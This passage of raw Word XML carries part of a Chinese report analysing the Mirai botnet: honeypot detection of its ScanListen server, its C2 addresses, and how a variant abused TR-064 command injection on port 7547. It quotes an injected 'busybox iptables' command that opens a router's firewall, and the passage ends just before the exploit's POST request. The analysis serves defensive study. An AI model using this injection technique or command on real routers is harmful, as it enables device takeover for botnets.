          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>泰格实验室</w:t>
      </w:r>
      <w:r w:rsidR="00201D9B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>设立了蜜罐对Mirai进行了检测</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-287517253"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C86368">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C86368">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00C86368">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 泰格实17 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00C86368">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00C86368">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[14]</w:t>
          </w:r>
          <w:r w:rsidR="00C86368">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00201D9B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。他们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>伪装成Bot，同疑似ScanListen通信，声称发现了蜜罐主机的Telnet口令，该口令为一个复杂的不重复口令。如果对方</w:t>
      </w:r>
      <w:r w:rsidR="004F757C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>确为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ScanListen并上套，会对蜜罐进行入侵，从而暴露自己</w:t>
      </w:r>
      <w:r w:rsidR="00534C50">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00194994">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>则可</w:t>
      </w:r>
      <w:r w:rsidR="00534C50">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过口令锁定ScanListen的地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00C86368">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>另外，泰格实验室通过蜜罐收集到了大量的Mirai扫描所用的弱口令。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000351D5" w:rsidRDefault="002D2486" w:rsidP="00B90D0F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007409B1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>一旦一个设备被入侵</w:t>
      </w:r>
      <w:r w:rsidR="007409B1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="007409B1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mirai将</w:t>
      </w:r>
      <w:r w:rsidR="007409B1" w:rsidRPr="007409B1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>会杀死其他蠕虫和木马程序，关闭远程服务禁止其他设备远程链接</w:t>
      </w:r>
      <w:r w:rsidR="007409B1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00E37AD2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在22，23，80</w:t>
      </w:r>
      <w:r w:rsidR="007C2A53">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidR="00E37AD2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>上进行监听的端口将会被杀死。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0061327F" w:rsidRDefault="000351D5" w:rsidP="000351D5">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>匡恩在报告</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="1600993203"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 匡恩网16 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="000351D5">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[13]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>提供了</w:t>
      </w:r>
      <w:r w:rsidR="007C2A53">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Listen的通信地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.changeme.com:48101,C2的通信地址为cnc.changeme.com:23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2A53" w:rsidRPr="00521E90" w:rsidRDefault="007C2A53" w:rsidP="00B90D0F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90D0F" w:rsidRPr="00B90D0F" w:rsidRDefault="00B90D0F" w:rsidP="00B90D0F"/>
    <w:p w:rsidR="00B90D0F" w:rsidRPr="00B90D0F" w:rsidRDefault="00B90D0F" w:rsidP="00B90D0F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc472191673"/>
      <w:r>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidR="00E61CEE">
        <w:t>(7547)</w:t>
      </w:r>
      <w:r>
        <w:t>感染原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00B90D0F" w:rsidRDefault="00C87FA2" w:rsidP="000F74D9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>2016年11月出现的变种</w:t>
      </w:r>
      <w:r>
        <w:t>针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7547</w:t>
      </w:r>
      <w:r>
        <w:t>/5555</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描，</w:t>
      </w:r>
      <w:r w:rsidRPr="00452B08">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>利用远程命令执行漏洞</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
            <w:bCs/>
          </w:rPr>
          <w:id w:val="-1890103300"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs/>
            </w:rPr>
            <w:instrText>CITATION 绿盟科16 \l 2052</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F74D9" w:rsidRDefault="000F74D9" w:rsidP="000F74D9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>受攻击的路由器默认将7547端口分配给TR-069协议，该协议全称为“CPE WAN Management Protocol”，用于远程管理设备，ISP可以利用该协议对这些设备远程进行管理，因此7547端口就被暴露到了互联网上。然而在Eir</w:t>
      </w:r>
      <w:r w:rsidR="000C123E">
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteReference w:id="4"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> D1000 modem中，7457端口同时还被TR-064协议“LAN-Side CPE Configuration”使用。这个协议的目的是让ISP给路由器安装软件，但是并不是面向路由器的WAN端。当两个服务一起进行时，就产生了错误，这个漏洞最早是在2016年11月7日爆出来的。</w:t>
      </w:r>
      <w:r w:rsidR="00247FA1" w:rsidRPr="00247FA1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在TR-064的说明文档中</w:t>
      </w:r>
      <w:r w:rsidR="00110B80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提到</w:t>
      </w:r>
      <w:r w:rsidR="00247FA1" w:rsidRPr="00247FA1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，TR-064服务允许在CPE</w:t>
      </w:r>
      <w:r w:rsidR="00221B73">
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteReference w:id="5"/>
      </w:r>
      <w:r w:rsidR="00247FA1" w:rsidRPr="00247FA1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上对NTP/SNTP时间客户端进行配置。</w:t>
      </w:r>
      <w:r w:rsidR="00AC028D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而某些设备在实现这一功能时，允许攻击者注入任意命令</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:id w:val="409208838"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00AC028D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:instrText>CITATION len16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[15]</w:t>
          </w:r>
          <w:r w:rsidR="00AC028D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00AC028D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F74D9" w:rsidRDefault="000F74D9" w:rsidP="000F74D9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E70CAA" w:rsidRDefault="00E70CAA">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0506" w:rsidRDefault="007C0506">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1300378"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="https://upload.wikimedia.org/wikipedia/commons/e/ef/Remote_CPE_Control_via_TR-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e/ef/Remote_CPE_Control_via_TR-06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300378"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0506" w:rsidRDefault="007C0506">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0506" w:rsidRDefault="007C0506">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E6248" w:rsidRDefault="005363C5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击者通过</w:t>
      </w:r>
      <w:r w:rsidR="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SOAP Exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>对7547端口发送特定命令的数据包，执行命令“busybox iptables -I INPUT -p tcp --dport 80 -j ACCEPT”，开启防火墙80端口，使攻击者远程访问网络管理界面，植入攻击代码。 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRDefault="00B01A51">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>具体地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击者是向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TCP/7547发送如下HTTP POST报文：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
